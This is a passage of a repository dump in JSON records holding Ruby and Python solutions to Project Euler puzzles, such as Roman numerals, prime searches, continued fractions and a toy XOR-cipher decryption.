"license_type": "no_license", "max_line_length": 84, "num_lines": 27, "path": "/89/roman.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nSUB_ARR = [\n [\"DCCCC\", \"MC\"],\n [\"CCCC\", \"CD\"],\n [\"LXXXX\", \"XC\"],\n [\"XXXX\", \"XL\"],\n [\"VIIII\", \"IX\"],\n [\"IIII\", \"IV\"],\n]\n\ndef refine_roman(roman)\n refined_roman = roman\n SUB_ARR.each do |x|\n refined_roman = refined_roman.gsub(x[0], x[1]) if (refined_roman.include?(x[0]))\n end\n refined_roman \nend\n\ndef total_length(arr_of_strings)\n arr_of_strings.inject(0) { |sum, x| sum + x.length }\nend\n\nnumerals = IO.readlines('roman.txt').map { |x| x.chomp }\ninitial_len = total_length(numerals)\nreduced_nums = numerals.map { |x| refine_roman(x) }\nreduced_len = total_length(reduced_nums)\np initial_len - reduced_len\n" }, { "alpha_fraction": 0.446153849363327, "alphanum_fraction": 0.5653846263885498, "avg_line_length": 19, "blob_id": "9017fc0699f02b7910667b4ecf6cb74874e3054a", "content_id": "a2084eacc066890c508ed660c4c29775f9cb1cfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/31/currency.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n# See http://www.blindrut.ca/~neitsch/math/talks/m496pres1.nb.pdf\na = [1, 2, 5, 10, 20, 50, 100, 200]\n\ndef fn(n, k):\n\tif k < 0 or n < 0:\n\t\treturn 0\n\telif n == 0:\n\t\treturn 1\n\telse:\n\t\treturn fn(n, k - 1) + fn(n - a[k], k)\n\nprint(fn(200, 7))\n" }, { "alpha_fraction": 0.5917525887489319, "alphanum_fraction": 0.6268041133880615, "avg_line_length": 15.166666984558105, "blob_id": "4b2ba5d7bcd8fbb41cf6afc0e87cb84151651fb7", "content_id": "614a71d60bf64ee2bf8c51bfe8cdc59cc6ac5f2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 45, "num_lines": 30, "path": "/74/factorial_chains.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom math import factorial\n\nfac = {}\nfor i in xrange(0, 10):\n\tfac[i] = factorial(i)\n\ndef sum_factorial_digits(x):\n\treturn sum([fac[int(i)] for i in str(x)])\n\nknown = {}\ndef chain(x, terms):\n\tif (x in known):\n\t\treturn len(terms) + known[x]\n\n\tif (x in terms):\n\t\treturn len(terms)\n\t\n\tterms.append(x)\n\treturn chain(sum_factorial_digits(x), terms)\n\ncount = 0\nfor i in xrange(1, 1000000):\n\tres = chain(i, [])\n\tknown[i] = res\n\tif (res == 60):\n\t\tcount += 1\n\nprint(count)\n" }, { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6461039185523987, "avg_line_length": 21, "blob_id": "b26df7773bde64207b8dd092d34a9f19d036830d", "content_id": "85bedf8d625677f990bacc3e38afc0bf72729a9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 80, "num_lines": 14, "path": "/69/relatively_prime.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import *\n\nmax_result = 0\nmax_n = 2\nfor n in xrange(2, 1000000):\n\tn_on_phin = float(n) / totient(n)\n\tif n_on_phin > max_result:\n\t\tmax_result = n_on_phin\n\t\tmax_n = n\n\nprint(max_n)\n" }, { "alpha_fraction": 0.6101694703102112, "alphanum_fraction": 0.6483050584793091, "avg_line_length": 25.22222137451172, "blob_id": "48e9d1db6860608c6def27f3b4c431ef956ba7e4", "content_id": "6257c3df30b9e67c2ecbf01b9e483b18dd76ddbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 236, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/54/poker.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nrequire 'ruby-poker'\n\nhands = IO.readlines(File.new(\"poker.txt\")).map do |line|\n\tstripped = line.strip\n\t[stripped[0..13], stripped[15..30]].map { |hand| PokerHand.new(hand) }\nend\n\np hands.select { |x| x[0] > x[1] }.size\n" }, { "alpha_fraction": 0.5577617287635803, "alphanum_fraction": 0.5866426229476929, "avg_line_length": 29.77777862548828, "blob_id": "0dd070bfcba6297e2e318a98b670dde0aa3eac8c", "content_id": "d7fa773c7c460a4814849b2f5bbe6f66b98db1ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 554, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/49/sequential_primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby \n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\nrequire 'set'\n\nPRIMES = Primes::sieve(10000).select { |x| x > 1000 }\ngrouped = PRIMES.group_by { |x| x.to_s.chars.sort }.values.reject {|v| v.size < 3 }\n\nvals = grouped.map do |g|\n\tdiffs_map = g.combination(2).to_a.map do |x| \n\t\tHash[(x[0] - x[1]).abs, x] \n\tend.reduce({}) do |h, x| \n\t\th.merge(x) { |k, old, new| (old + new).sort.uniq }\n\tend\n\tdiffs_map.values.select { |x| x.size == 3 }\nend.reject { |x| x.empty? }\n\np vals[1][0].map { |x| x.to_s }.join(\"\").to_i\n" }, { "alpha_fraction": 0.6420187950134277, "alphanum_fraction": 0.6678403615951538, "avg_line_length": 21.421052932739258, "blob_id": "a12eb3c87cf830f2421b994ed2246b9c9b404daf", "content_id": "f8448bce3a72d85a2daf6214a655380a22220dc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 852, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/50/consecutive_primes.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nfrom math import ceil, sqrt\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import primesbelow\n\nnum_primes = 1000000\nprimes = primesbelow(num_primes)\nprimes_len = len(primes)\nprime_set = set(primes)\n\nmax_count = 0\nmax_sum = 2\nsums = [primes[0]]\n\nfor i in xrange(1, primes_len):\n\tsums.append(sums[i - 1] + primes[i])\n\ndef max_vals(i, correction_factor):\n\tfor j in reversed(xrange(i+1, primes_len)):\n\t\tcount = j - i\n\t\tprime_sum = sums[j] - correction_factor\t\n\t\tif prime_sum in prime_set: \n\t\t\treturn [count, prime_sum]\n\treturn None\n\nfor i in xrange(0, primes_len):\n\tcorrection_factor = 0\n\tif i != 0:\n\t\tcorrection_factor = sums[i - 1] \n\n\tvals = max_vals(i, correction_factor)\t\n\tif vals:\n\t\tif vals[0] > max_count:\n\t\t\tmax_count = vals[0]\t\n\t\t\tmax_sum = vals[1]\n\nprint(max_sum)\n" }, { "alpha_fraction": 0.4976958632469177, "alphanum_fraction": 0.5622119903564453, "avg_line_length": 13.466666221618652, "blob_id": "28546a3afa30aa5a8ba25eef382d2c8d7c6a420f", "content_id": "48685d4145f803e691f56667e42b86d2d85bd203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 51, "num_lines": 15, "path": "/7/prime.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport math\n\ndef is_prime(x):\n\tlim = int(math.ceil(math.sqrt(x)))\n\treturn all(x % i != 0 for i in xrange(2, lim + 1))\n\nn = 1\nx = 3 \nwhile (n < 10001):\n\tif is_prime(x):\n\t\tprint x\n\t\tn += 1\n\tx += 1\n" }, { "alpha_fraction": 0.5438066720962524, "alphanum_fraction": 0.5619335174560547, "avg_line_length": 24.461538314819336, "blob_id": "bc3e6915eeead80b85e54b22ac8ea67d7b3767c1", "content_id": "abae86e6aa11622491584778fba3394fc2ae5ac8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 993, "license_type": "no_license", "max_line_length": 159, "num_lines": 39, "path": "/51/same_digit_primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\n\ndef bit_locations(selector, on = true)\n\tlocs = []\n\tpos = 0\n\tselector.each do |d|\n\t\tif (on && d == '1')\n\t\t\tlocs << pos\n\t\telsif (!on && d == '0')\n\t\t\tlocs << pos\n\t\tend\n\t\tpos += 1\n\tend\n\tlocs\nend\n\ndef ons_equal?(p, selector)\n\tlocs = bit_locations(selector)\n\tmap = locs.map { |x| p[x] } \n\tmap.all? { |x| x == p[locs[0]] }\nend\n\ndef off_values(p, selector)\n\tbit_locations(selector, false).map { |x| p[x] }\nend\n\t\t\nlimit = 1000000\nprimes = Primes::sieve(limit).map { |x| x.to_s.chars.to_a }.group_by { |x| x.size }\n\nprimes.each do |size, subset|\n\tseries = (1..(2**size - 1)).map do |n| \n\t\tselector = (\"%0#{size}b\" % n).chars\n\t\tsubset.select { |p| ons_equal?(p, selector) }.group_by { |p| off_values(p, selector) }.select {|k, v| v.size == 8 }.values.flatten(1).map { |v| v.join.to_i }\n\tend.reject { |s| s.empty? }.flatten\n\t\n\tp series.first if (!series.empty?)\nend\n" }, { "alpha_fraction": 0.6269165277481079, "alphanum_fraction": 0.6643952131271362, "avg_line_length": 24.521739959716797, "blob_id": "e602772f6a4ec44e51a5cfd28de4432749690955", "content_id": "85ea7100b5ce21164c3a998c38e62aa92df98d0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 75, "num_lines": 23, "path": "/45/shaped_numbers.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport math\n\nlimit = 100000\ntriangle_numbers = []\n\ndef has_positive_integral_roots(a, b, c):\n\tsqrt_discriminant = math.sqrt(b*b - 4 * a * c)\n\tdivisor = 2*a\n\troots = [(-b + sqrt_discriminant), (-b - sqrt_discriminant)] \n\treturn any(i > 0 and i % divisor == 0 for i in roots)\n\ndef is_pentagonal(p):\n\treturn has_positive_integral_roots(3, -1, -2 * p)\n\ndef is_hexagonal(h):\n\treturn has_positive_integral_roots(2, -1, -h)\n\nfor n in range(286, limit):\n\ttriangle_numbers.append((n * (n + 1))/2)\n\nprint [x for x in triangle_numbers if is_pentagonal(x) and is_hexagonal(x)]\n" }, { "alpha_fraction": 0.5968436002731323, "alphanum_fraction": 0.615494966506958, "avg_line_length": 21.483871459960938, "blob_id": "0dbfeda61dbcee1ec883b9e78a0769b35be50d92", "content_id": "dfca157ae9960fe292390e609f327e87d39f39ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 697, "license_type": "no_license", "max_line_length": 72, "num_lines": 31, "path": "/59/cipher.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndef xor_arrays(arr1, arr2)\n\tarr1.zip(arr2).map { |x| (x[0] ^ x[1]).chr }\nend\n\ndef xor_encrypt(str, key)\n\tstr.each_slice(key.size).map do |slice| \n\t\txor_arrays(slice, key.bytes)\n\tend.flatten.join\nend\n\ndef bins(arr, n)\n\t(0..n-1).map do |bin|\n\t\tbin.step(arr.size, n).map { |x| arr[x] }\t\n\tend\nend\n\ndef highest_freq(arr)\n\tfreq = arr.inject(Hash.new(0)) { |h,v| h[v] += 1; h}\n\tarr.sort_by { |v| freq[v] }.last\nend\n\nf = File.new(\"cipher1.txt\")\nchars = f.readlines[0].strip.split(\",\").map {|x| x.to_i }\nspace = \" \".ord\nkey = bins(chars, 3).map { |x| (highest_freq(x).to_i ^ space).chr }.join\n\ndecrypted = xor_encrypt(chars, key)\np decrypted\np decrypted.bytes.map { |x| x.ord }.reduce(:+)\n" }, { "alpha_fraction": 0.6100323796272278, "alphanum_fraction": 0.6343042254447937, "avg_line_length": 19.600000381469727, "blob_id": "54bca6a7ef7d01d66019e7a65467dc5036843400", "content_id": "1872cffeac3fb3a453a06f715e7eaedfbad7aace", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 618, "license_type": "no_license", "max_line_length": 72, "num_lines": 30, "path": "/23/abundant.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nrequire 'set'\n\ndef divisors(x)\n\tlimit = Math.sqrt(x).ceil + 1\n\tinitial_divisors = (1..limit).select { |d| x % d == 0 }\n\tdivisors = Set.new(initial_divisors)\n\tinitial_divisors.each do |d| \n \tdividend = x / d\n if (dividend != d and dividend != x)\n \tdivisors << dividend\n\t\tend\n\tend\n\n\tdivisors\nend\n\ndef abundant?(x)\n\tdivisors(x).reduce(:+) > x\nend\n\nabundant_set = (4..20161).select { |x| abundant?(x)}\nsum_of_two_abundants = Set.new\nabundant_set.each do |x|\n\tabundant_set.each do |y|\n\t\tsum_of_two_abundants << x + y\n\tend\nend\n\np (1..20161).select { |x| !sum_of_two_abundants.include?(x) }.reduce(:+)\n" }, { "alpha_fraction": 0.5854014754295349, "alphanum_fraction": 0.6014598608016968, "avg_line_length": 21.09677505493164, "blob_id": "f7d20517ff00c970e4d8d2e0d6e3daf7bb98e55d", "content_id": "fff83f90c2821dd4c85f210aab7cda76f5676147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 685, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/33/unorthodox_fractions.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nfrom fractions import Fraction\n\ndef replace_single(str_n, r):\n\trepl = str_n.replace(r, \"\")\n\tif not repl:\n\t\trepl = r \n\treturn repl\n\nunorthodox_f = []\nfor d in xrange(12, 100):\n\tif \"0\" in str(d):\n\t\tcontinue\n\t\n\tfor n in xrange(11, d):\n\t\tif \"0\" in str(n) or all(k not in str(d) for k in str(n)):\n\t\t\tcontinue\n\n\t\tf = Fraction(n, d)\n\t\tfor k in str(n):\n\t\t\tstr_d = str(d)\n\t\t\trepl_d = replace_single(str_d, k)\n\t\t\trepl_n = replace_single(str(n), k)\n\n\t\t\tif repl_d != str_d:\n\t\t\t\treduced_f_str = \"%s/%s\" % (repl_n, repl_d)\n\t\t\t\treduced_f = Fraction(reduced_f_str)\t\n\t\t\t\tif (reduced_f == f):\n\t\t\t\t\tunorthodox_f.append(f)\n\nprint(reduce(lambda x, y: x * y, unorthodox_f).denominator)\n" }, { "alpha_fraction": 0.5367231369018555, "alphanum_fraction": 0.598870038986206, "avg_line_length": 11.642857551574707, "blob_id": "9148022f9de000156e6df55ad87b36f5ccb03e3e", "content_id": "4bacfb4c7db61b8a4f8605426214ddcbb26ab9f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 177, "license_type": "no_license", "max_line_length": 24, "num_lines": 14, "path": "/28/spiral.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndiagonal_sum = 1\nlast = 1\n\n(3..1001).step(2) do |x|\n\tdelta = x - 1\n\t(1..4).each do |corner|\n\t\tlast += delta\n\t\tdiagonal_sum += last\n\tend\nend\t\n\nputs diagonal_sum\n" }, { "alpha_fraction": 0.5985401272773743, "alphanum_fraction": 0.6496350169181824, "avg_line_length": 20.076923370361328, "blob_id": "1c39d93dd1ef67264a44d47b3621dd59ecec8bdf", "content_id": "6b3f8d2298bcda83bb04508e0556f99be0cfdc84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 274, "license_type": "no_license", "max_line_length": 80, "num_lines": 13, "path": "/72/proper_fractions_set.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import *\n\ndef farey_terms(n):\n\tcount = 0\n\tfor i in xrange(1, n + 1):\n\t\tcount += totient(i)\n\treturn count + 1 \n\nprint(farey_terms(1000000) - 2)\n" }, { "alpha_fraction": 0.49400922656059265, "alphanum_fraction": 0.5400921702384949, "avg_line_length": 32.90625, "blob_id": "16547d1248e2b127ee3763a66a8b11349a442e73", "content_id": "bd65d772067bacdb4383438b988a4bf8175e84f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1085, "license_type": "no_license", "max_line_length": 168, "num_lines": 32, "path": "/17/letters_and_numbers.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nUNITS = {thousands: 1000, hundreds: 100, tens: 10, ones: 1}\nWORDS = {0 => \"\", 1 => \"one\", 2 => \"two\", 3 => \"three\", 4 => \"four\", 5 => \"five\", 6 => \"six\", 7 => \"seven\", 8 => \"eight\", 9 => \"nine\"}\nTEENS = {0 => \"ten\", 1 => \"eleven\", 2 => \"twelve\", 3 => \"thirteen\", 4 => \"fourteen\", 5 => \"fifteen\", 6 => \"sixteen\", 7 => \"seventeen\", 8 => \"eighteen\", 9 => \"nineteen\"}\nTENS = {0 => \"\", 2 => \"twenty\", 3 => \"thirty\", 4 => \"forty\", 5 => \"fifty\", 6 => \"sixty\", 7 => \"seventy\", 8 => \"eighty\", 9 => \"ninety\"}\n\n\ndef to_letters(x)\n\tbase = {}\n\tUNITS.each do |unit, val|\n\t\tbase[unit] = x / val\n\t\tx -= val * base[unit]\n\tend\n\t\n\tletters = \"\"\n\tletters << WORDS[base[:thousands]] + \"thousand\" unless base[:thousands] == 0\n\tletters << WORDS[base[:hundreds]] + \"hundred\" unless base[:hundreds] == 0\n\tletters << \"and\" if base[:hundreds] != 0 && (base[:tens] != 0 || base[:ones] != 0)\n\t\n\tcase base[:tens]\n\t\twhen 1\n\t\t\tletters << TEENS[base[:ones]]\n\t\telse\n\t\t\tletters << TENS[base[:tens]]\n\t\t\tletters << WORDS[base[:ones]] \n\tend\n\n\tletters\nend\n\nputs (1..1000).map {|x| to_letters(x)}.join.length\n" }, { "alpha_fraction": 0.5254777073860168, "alphanum_fraction": 0.5605095624923706, "avg_line_length": 12.65217399597168, "blob_id": "843a26d017d51edc5fc2ffde5503d17b21a50c9f", "content_id": "83aa366940058e906a0512aef1472b2dc2c93cc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 314, "license_type": "no_license", "max_line_length": 36, "num_lines": 23, "path": "/38/pandigital_prod.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nDIGITS = (1..9).map(&:to_s)\ndef pandigital(x)\n\tdigits = x.map(&:to_s).join\n\tif digits.split(//).sort! == DIGITS\n\t\tdigits.to_i\n\telse\n\t\tnil\n\tend\nend\n\nmax = 0\n(1..10000).each do |x|\n\tprods = [x]\t\n\t(2..9).each do |n|\n\t\tprods << n * x\t\n\t\tp = pandigital(prods)\n\t\tmax = p if p && p > max\n\tend\nend\n\np max\n" }, { "alpha_fraction": 0.46979865431785583, "alphanum_fraction": 0.5503355860710144, "avg_line_length": 36.25, "blob_id": "f821f65d9430522bcfde01d7a14bd7e82afbab60", "content_id": "be3b32f75cdeacdfdd46252be960c95278caa740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 73, "num_lines": 4, "path": "/63/n_digit_nth_powers.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\na = [10 - math.ceil((10 ** (n - 1)) ** (1.0 / n)) for n in xrange(1, 23)]\nprint(int(reduce(lambda x, y: x + y, a)))\n" }, { "alpha_fraction": 0.6033755540847778, "alphanum_fraction": 0.649789035320282, "avg_line_length": 17.230770111083984, "blob_id": "05b1fced7e5d77b86565e67246d41240f125f078", "content_id": "6f388f04a87d43429556f86a8c5cdee2dd110618", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 237, "license_type": "no_license", "max_line_length": 76, "num_lines": 13, "path": "/57/sqrt_two.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nlast_exp = 0\ncount = 0\n\n(1..1000).each do |x|\n\tdecimal = Rational(1, (2 + last_exp))\n\tlast_exp = decimal\n\tsqrt_two = 1 + decimal \n\tcount += 1 if sqrt_two.numerator.to_s.size > sqrt_two.denominator.to_s.size\nend\n\np count\n" }, { "alpha_fraction": 0.6159420013427734, "alphanum_fraction": 0.7536231875419617, "avg_line_length": 26.600000381469727, "blob_id": "ae8d92e6f2021d0e804bea66deb7fc215383d7c2", "content_id": "5917c974ee21af401250a7c9ef04d9430dba420e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 83, "num_lines": 5, "path": "/71/proper_fractions.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom fractions import Fraction\n\nprint((Fraction(3, 7) - Fraction(1, 1000000)).limit_denominator(1000000).numerator)\n" }, { "alpha_fraction": 0.5978260636329651, "alphanum_fraction": 0.633152186870575, "avg_line_length": 32.45454406738281, "blob_id": "18fa6a02252d061ecd2baf8e61fbcb96034551c4", "content_id": "c519f947e46cd33a20cc86f8b68a48c0f2345840", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 368, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/42/triangle_words.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nwords = File.new(\"words.txt\").readline.gsub('\"', \"\").split(',')\nvalues = words.map do |word|\n\tword.bytes.map { |b| b - 64 }.reduce(:+)\nend\n\nrequire 'set'\n# Maximum in the words is 192, so generate triangle numbers until 210\ntriangle_numbers = Set.new((1..20).map { |n| (n * (n + 1)) / 2 })\nputs values.select { |v| triangle_numbers.include?(v) }.size\n" }, { "alpha_fraction": 0.48843538761138916, "alphanum_fraction": 0.5687074661254883, "avg_line_length": 20, "blob_id": "c836933508417d2a0025fe360be11fb54bc8e81e", "content_id": "2d978b0729f24b7cd616aca805e674dde6006241", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/102/triangles.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport fileinput\n\ndef dot(x, y):\n\treturn float(sum([x[i] * y[i] for i in xrange(len(x))]))\n\ndef sub(x, y):\n\treturn [x[i] - y[i] for i in xrange(len(x))]\n\ndef contains_origin(a, b, c):\n\tv0 = sub(a, c)\n\tv1 = sub(a, b)\n\tv2 = a\n\n\tdot00 = dot(v0, v0)\n\tdot01 = dot(v0, v1)\n\tdot02 = dot(v0, v2)\n\tdot11 = dot(v1, v1)\n\tdot12 = dot(v1, v2)\n\n\tinv = 1 / (dot00 * dot11 - dot01 * dot01)\n\tu = (dot11 * dot02 - dot01 * dot12) * inv\n\tv = (dot00 * dot12 - dot01 * dot02) * inv\n\n\treturn (u > 0) and (v > 0) and (u + v < 1)\t\n\ncount = 0\nfor line in fileinput.input(\"triangles.txt\"):\n\tseq = [int(num) for num in line.split(\",\")]\n\ta, b, c = [seq[i:i+2] for i in range(0, 6, 2)]\n\tif contains_origin(a, b, c):\n\t\tcount += 1\t\n\nprint count\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5147929191589355, "avg_line_length": 14.363636016845703, "blob_id": "0184a2d2977300d188d6732017f24248e8668639", "content_id": "30c80e101f83c8b8837d47d1b077f1dd944b7cfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 169, "license_type": "no_license", "max_line_length": 59, "num_lines": 11, "path": "/56/digital_sum.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nmax = 0\n(1..100).each do |a|\n\t(1..100).each do |b|\n\t\tsum =\t(a**b).to_s.split(//).map {|x| x.to_i }.reduce(:+)\t\n\t\tmax = sum if sum > max\n\tend\nend\n\np max\n" }, { "alpha_fraction": 0.5431472063064575, "alphanum_fraction": 0.6294416189193726, "avg_line_length": 15.416666984558105, "blob_id": "e8873f943b896c2f4f679b012512068bacac83b0", "content_id": "583ee325d1b3cb2ca5eafba137d3607207dd84df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 31, "num_lines": 12, "path": "/19/sundays.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport datetime\n\nsundays = 0\n\nfor y in xrange(1901, 2001):\n\tfor m in xrange(1, 13):\n\t\tdate = datetime.date(y, m, 1)\n\t\tif (date.weekday() == 6):\n\t\t\tsundays += 1\n\nprint(sundays)\n" }, { "alpha_fraction": 0.5902140736579895, "alphanum_fraction": 0.6131498217582703, "avg_line_length": 18.81818199157715, "blob_id": "7f2864fedaf99b0489e69931f43479edb133f0dd", "content_id": "3588dc0a8ffa5817001adb1049c1bfe710725e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 50, "num_lines": 33, "path": "/64/continued_fracs_sqrt.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom math import sqrt\n\ndef expand(sq, num, sub):\n\tden = (sq - sub * sub) / num\n\tnext_term = int((sqrt(sq) + sub) / den)\n\tnext_sub = den * next_term - sub\n\treturn (next_term, den, next_sub)\n\ndef continued_fracs(sq):\n\tinitial_guess = int(sqrt(sq))\n\tif (initial_guess ** 2 == sq):\n\t\treturn []\n\t\n\tterm, num, sub = expand(sq, 1, initial_guess) \t\t\t\n \tterms = [term]\n\t\t\n\twhile (True):\n\t\tif (term == initial_guess * 2):\n\t\t\tbreak\n\t\tterm, num, sub = expand(sq, num, sub)\n\t\tterms.append(term)\n\n\treturn terms\n\nodd_period = 0\nlimit = 10001\nfor i in xrange(1, limit):\n\tif (len(continued_fracs(i)) % 2 != 0):\n\t\todd_period += 1 \n\nprint(odd_period)\n" }, { "alpha_fraction": 0.6010100841522217, "alphanum_fraction": 0.6161616444587708, "avg_line_length": 23.75, "blob_id": "a99d9213cc2ec9534d6e01bd8de889193bc410ec", "content_id": "a7da11ee85c6affc253ad99a166c7acf1c11a7cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 198, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/99/base_exp.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nlines = IO.readlines(File.new(\"base_exp.txt\"))\nlogs = lines.map do |x| \n\tsplit = x.strip.split(\",\").map { |n| n.to_i }\n\tMath.log(split[0]) * split[1]\nend\np logs.index(logs.max) + 1\n" }, { "alpha_fraction": 0.4381271004676819, "alphanum_fraction": 0.6722407937049866, "avg_line_length": 23.91666603088379, "blob_id": "a02d70d816b499b1a5bbeeea80a168193f6642e8", "content_id": "7416398c9c000a2967225c2a8a39abdefd1d0675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 299, "license_type": "no_license", "max_line_length": 63, "num_lines": 12, "path": "/206/unique_square.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nlower = 101010101 # 10203040506070809 ** 0.5\nupper = 138902662 # 19293949596979899 ** 0.5\nregex = /1\\d2\\d3\\d4\\d5\\d6\\d7\\d8\\d9/\n\n# Squares of even numbers are even (and in fact divisible by 4)\nresult = lower.step(upper, 4).find do |x|\n\t(x ** 2).to_s.match(regex)\nend\n\np result * 10\n" }, { "alpha_fraction": 0.5735196471214294, "alphanum_fraction": 0.5934796929359436, "avg_line_length": 16.89285659790039, "blob_id": "53f47ce4318005bf4344c36c7db96de46d007e71", "content_id": "21fb633e0d0fb40830fb3fc4f6af8c23fb2f9009", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1503, "license_type": "no_license", "max_line_length": 88, "num_lines": 84, "path": "/61/cyclic_polygonal.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire 'set'\n\ndef triangle(n)\n\t(n * (n + 1)) / 2\nend\n\ndef square(n)\n\tn ** 2\nend\n\ndef pentagonal(n)\n\t(n * (3 * n - 1)) / 2\nend\n\ndef hexagonal(n)\n\tn * (2 * n -1)\nend\n\ndef heptagonal(n)\n (n * (5 * n - 3)) / 2\nend\n\ndef octagonal(n)\n\tn * (3 * n - 2)\nend\n\ndef all_in_range(n, fn, range = (1000..9999), match = [])\n\tx = send(fn, n)\n\tif x < range.begin\n\t\tall_in_range(n + 1, fn, range, match)\n\telsif x > range.end\n\t\tmatch\n\telse\n\t\tmatch << x\n\t\tall_in_range(n + 1, fn, range, match)\n\tend\nend\n\ndef are_cyclic?(a, b)\n\ta.to_s[0..1] == b.to_s[2..3]\nend\t\n\ndef find_cyclic(nums, cyclic_set, indices)\n\tif indices.empty?\n\t\tif are_cyclic?(cyclic_set.first, cyclic_set.last)\n\t\t\treturn 